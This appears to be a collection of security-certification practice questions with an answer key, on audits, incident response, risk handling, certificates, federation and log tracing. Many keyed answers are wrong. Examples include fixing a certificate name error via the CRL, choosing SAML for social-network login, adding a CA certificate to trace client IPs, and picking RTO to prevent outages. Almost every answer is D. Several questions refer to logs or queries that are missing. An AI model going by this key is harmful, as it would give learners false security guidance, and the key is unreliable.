An enterprise is undergoing an audit to review change management activities when promoting code to production. The audit reveals the following: 1. Some developers can directly publish code to the production environment. 2. Static code reviews are performed adequately. 3. Vulnerability scanning occurs on a regularly scheduled basis per policy. Which of the following should be noted as a recommendation within the audit report? A. Implement short maintenance windows. B. Perform periodic account reviews. C. Implement job rotation. D. Improve separation of duties.

Correct Answer: D. Improve separation of duties.

A security analyst observes the following while looking through network traffic in a company's cloud log: Which of the following steps should the security analyst take FIRST? A. Quarantine 10.0.5.52 and run a malware scan against the host. B. Access 10.0.5.52 via EDR and identify processes that have network connections. C. Isolate 10.0.50.6 via security groups. D. Investigate web logs on 10.0.50.6 to determine if this is normal traffic.

Correct Answer: D. Investigate web logs on 10.0.50.6 to determine if this is normal traffic.

A host on a company's network has been infected by a worm that appears to be spreading via SMB. A security analyst has been tasked with containing the incident while also maintaining evidence for a subsequent investigation and malware analysis. Which of the following steps would be best to perform FIRST? A. Turn off the infected host immediately. B. Run a full anti-malware scan on the infected host. C. Modify the smb.conf file of the host to prevent outgoing SMB connections. D. Isolate the infected host from the network by removing all network connections.

Correct Answer: D. Isolate the infected host from the network by removing all network connections.

A networking team asked a security administrator to enable Flash on its web browser. The networking team explained that an important legacy embedded system gathers SNMP information from various devices. The system can only be managed through a web browser running Flash. The embedded system will be replaced within the year but is still critical at the moment. Which of the following should the security administrator do to mitigate the risk? A. Explain to the networking team the reason Flash is no longer available and insist the team move up the timetable for replacement. B. Air gap the legacy system from the network and dedicate a laptop with an end-of-life OS on it to connect to the system via crossover cable for management. C. Suggest that the networking team contact the original embedded system's vendor to get an update to the system that does not require Flash. D. Isolate the management interface to a private VLAN where a legacy browser in a VM can be used as needed to manage the system.

Correct Answer: D. Isolate the management interface to a private VLAN where a legacy browser in a VM can be used as needed to manage the system.

A company's finance department acquired a new payment system that exports data to an unencrypted file on the system. The company implemented controls on the file so only appropriate personnel are allowed access. Which of the following risk techniques did the department use in this situation? A. Accept B. Avoid C. Transfer D. Mitigate

Correct Answer: D. Mitigate

Company A acquired Company B. During an audit, a security engineer found Company B's environment was inadequately patched. In response, Company A placed a firewall between the two environments until Company B's infrastructure could be integrated into Company A's security program. Which of the following risk-handling techniques was used? A. Accept B. Avoid C. Transfer D. Mitigate

Correct Answer: D. Mitigate Explanation/Reference: Reference: https://www.pivotpointsecurity.com/blog/risk-tolerance-in-business/

A security analyst discovered that a database administrator's workstation was compromised by malware. After examining the logs, the compromised workstation was observed connecting to multiple databases through ODBC. The following query behavior was captured: Assuming this query was used to acquire and exfiltrate data, which of the following types of data was compromised, and what steps should the incident response plan contain? A. Personal health information: Inform the human resources department of the breach and review the DLP logs. B. Account history: Inform the relationship managers of the breach and create new accounts for the affected users. C. Customer IDs: Inform the customer service department of the breach and work to change the account numbers. D. PAN: Inform the legal department of the breach and look for this data in dark web monitoring.

Correct Answer: D. PAN: Inform the legal department of the breach and look for this data in dark web monitoring.

Due to internal resource constraints, the management team has asked the principal security architect to recommend a solution that shifts partial responsibility for application-level controls to the cloud provider. In the shared responsibility model, which of the following levels of service meets this requirement? A. IaaS B. SaaS C. FaaS D. PaaS

Correct Answer: D. PaaS

An organization is prioritizing efforts to remediate or mitigate risks identified during the latest assessment. For one of the risks, a full remediation was not possible, but the organization was able to successfully apply mitigations to reduce the likelihood of impact. Which of the following should the organization perform NEXT? A. Assess the residual risk. B. Update the organization's threat model. C. Move to the next risk in the register. D. Recalculate the magnitude of impact.

Correct Answer: D. Recalculate the magnitude of impact.

A company launched a new service and created a landing page within its website network for users to access the service. Per company policy, all websites must utilize encryption for any authentication pages. A junior network administrator proceeded to use an outdated procedure to order new certificates. Afterward, customers are reporting the following error when accessing a new web page: NET:ERR_CERT_COMMON_NAME_INVALID. Which of the following BEST describes what the administrator should do NEXT? A. Request a new certificate with the correct subject alternative name that includes the new websites. B. Request a new certificate with the correct organizational unit for the company's website. C. Request a new certificate with a stronger encryption strength and the latest cipher suite. D. Request a new certificate with the same information but including the old certificate on the CRL.

Correct Answer: D. Request a new certificate with the same information but including the old certificate on the CRL

A company just released a new video card. Due to limited supply and high demand, attackers are employing automated systems to purchase the device through the company's web store so they can resell it on the secondary market. The company's intended customers are frustrated. A security engineer suggests implementing a CAPTCHA system on the web store to help reduce the number of video cards purchased through automated systems. Which of the following now describes the level of risk? A. Inherent B. Low C. Mitigated D. Residual. E. Transferred

Correct Answer: D. Residual.

A software house is developing a new application. The application has the following requirements: 1. Reduce the number of credential requests as much as possible 2. Integrate with social networks 3. Authenticate users Which of the following is the BEST federation method to use for the application? A. WS-Federation B. OpenID C. OAuth D. SAML

Correct Answer: D. SAML Explanation/Reference: Reference: https://auth0.com/blog/how-saml-authentication-works/

A security consultant needs to protect a network of electrical relays that are used for monitoring and controlling the energy used in a manufacturing facility. Which of the following systems should the consultant review before making a recommendation? A. CAN B. ASIC C. FPGA D. SCADA

Correct Answer: D. SCADA Explanation/Reference: Reference: https://www.sciencedirect.com/topics/computer-science/protective-relay

An attacker infiltrated the code base of a hardware manufacturer and inserted malware before the code was compiled. The malicious code is now running at the hardware level across a number of industries and sectors. Which of the following categories BEST describes this type of vendor risk? A. SDLC attack B. Side-load attack C. Remote code signing D. Supply chain attack

Correct Answer: D. Supply chain attack

A development team created a mobile application that contacts a company's back-end APIs housed in a PaaS environment. The APIs have been experiencing high processor utilization due to scraping activities. The security engineer needs to recommend a solution that will prevent and remedy the behavior. Which of the following would BEST safeguard the APIs? (Choose two.) A. Bot protection B. OAuth 2.0 C. Input validation D. Autoscaling endpoints E. Rate limiting F. CSRF protection

Correct Answer: D, E. Autoscaling endpoints; Rate limiting Explanation/Reference: Reference: https://stackoverflow.com/questions/3161548/how-do-i-prevent-site-scraping

Due to adverse events, a medium-sized corporation suffered a major operational disruption that caused its servers to crash and experience a major power outage. Which of the following should be created to prevent this type of issue in the future? A. SLA B. BIA C. BCM D. BCP E. RTO

Correct Answer: E. RTO

An auditor is reviewing the logs from a web application to determine the source of an incident. The web application architecture includes an Internet-accessible application load balancer, a number of web servers in a private subnet, application servers, and one database server in a tiered configuration. The application load balancer cannot store the logs. The following are sample log snippets: Which of the following should the auditor recommend to ensure future incidents can be traced back to the sources? A. Enable the X-Forwarded-For header at the load balancer. B. Install a software-based HIDS on the application servers. C. Install a certificate signed by a trusted CA. D. Use stored procedures on the database server. E. Store the value of $_SERVER['REMOTE_ADDR'] received by the web servers.

Correct Answer: C. Install a certificate signed by a trusted CA.
